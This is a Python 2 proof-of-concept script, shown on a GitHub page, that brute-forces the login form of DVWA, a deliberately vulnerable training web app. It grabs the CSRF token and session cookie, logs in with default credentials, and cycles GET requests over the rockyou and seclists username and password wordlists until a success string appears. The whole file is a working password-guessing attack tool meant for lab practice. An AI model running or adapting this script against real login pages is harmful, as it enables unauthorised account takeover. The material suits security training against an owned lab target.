-
Notifications
You must be signed in to change notification settings - Fork 37
/
dvwa-bruteforce-low-http-get.py
180 lines (140 loc) · 5.32 KB
/
dvwa-bruteforce-low-http-get.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/python
# Quick PoC template for brute force HTTP GET form
# Target: DVWA v1.10 (Brute Force - Low)
# Date: 2015-10-25
# Author: g0tmi1k ~ https://blog.g0tmi1k.com/
# Source: https://blog.g0tmi1k.com/dvwa/bruteforce-low/
import requests
import sys
import re
from BeautifulSoup import BeautifulSoup
# Variables
target = 'http://192.168.1.44/DVWA'
sec_level = 'low'
dvwa_user = 'admin'
dvwa_pass = 'password'
user_list = '/usr/share/seclists/Usernames/top_shortlist.txt'
pass_list = '/usr/share/seclists/Passwords/rockyou.txt'
# Value to look for in response header (Whitelisting)
success = 'Welcome to the password protected area'
# Get the anti-CSRF token
def csrf_token():
try:
# Make the request to the URL
print "\n[i] URL: %s/login.php" % target
r = requests.get("{0}/login.php".format(target), allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n[!] csrf_token: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target)
sys.exit(-1)
# Extract anti-CSRF token
soup = BeautifulSoup(r.text)
user_token = soup("input", {"name": "user_token"})[0]["value"]
print "[i] user_token: %s" % user_token
# Extract session information
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)
print "[i] session_id: %s" % session_id
return session_id, user_token
# Login to DVWA core
def dvwa_login(session_id, user_token):
# POST data
data = {
"username": dvwa_user,
"password": dvwa_pass,
"user_token": user_token,
"Login": "Login"
}
# Cookie data
cookie = {
"PHPSESSID": session_id,
"security": sec_level
}
try:
# Make the request to the URL
print "\n[i] URL: %s/login.php" % target
print "[i] Data: %s" % data
print "[i] Cookie: %s" % cookie
r = requests.post("{0}/login.php".format(target), data=data, cookies=cookie, allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n\n[!] dvwa_login: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target)
sys.exit(-1)
# Wasn't it a redirect?
if r.status_code != 301 and r.status_code != 302:
# Feedback for the user (there was an error again) & Stop execution of our request
print "\n\n[!] dvwa_login: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
sys.exit(-1)
# Did we log in successfully?
if r.headers["Location"] != 'index.php':
# Feedback for the user (there was an error) & Stop execution of our request
print "\n\n[!] dvwa_login: Didn't login (Header: %s user: %s password: %s user_token: %s session_id: %s).\n[i] Quitting." % (
r.headers["Location"], dvwa_user, dvwa_pass, user_token, session_id)
sys.exit(-1)
# If we got to here, everything should be okay!
print "\n[i] Logged in! (%s/%s)\n" % (dvwa_user, dvwa_pass)
return True
# Make the request to-do the brute force
def url_request(username, password, session_id):
# GET data
data = {
"username": username,
"password": password,
"Login": "Login"
}
# Cookie data
cookie = {
"PHPSESSID": session_id,
"security": sec_level
}
try:
# Make the request to the URL
#print "\n[i] URL: %s/vulnerabilities/brute/" % target
#print "[i] Data: %s" % data
#print "[i] Cookie: %s" % cookie
r = requests.get("{0}/vulnerabilities/brute/".format(target), params=data, cookies=cookie, allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target)
sys.exit(-1)
# Was it a ok response?
if r.status_code != 200:
# Feedback for the user (there was an error again) & Stop execution of our request
print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
sys.exit(-1)
# We have what we need
return r.text
# Main brute force loop
def brute_force(session_id):
# Load in wordlists files
with open(pass_list) as password:
password = password.readlines()
with open(user_list) as username:
username = username.readlines()
# Counter
i = 0
# Loop around
for PASS in password:
for USER in username:
USER = USER.rstrip('\n')
PASS = PASS.rstrip('\n')
# Increase counter
i += 1
# Feedback for the user
print ("[i] Try %s: %s // %s" % (i, USER, PASS))
# Make request
attempt = url_request(USER, PASS, session_id)
#print attempt
# Check response
if success in attempt:
print ("\n\n[i] Found!")
print "[i] Username: %s" % (USER)
print "[i] Password: %s" % (PASS)
return True
return False
# Get initial CSRF token
session_id, user_token = csrf_token()
# Login to web app
dvwa_login(session_id, user_token)
# Start brute forcing
brute_force(session_id)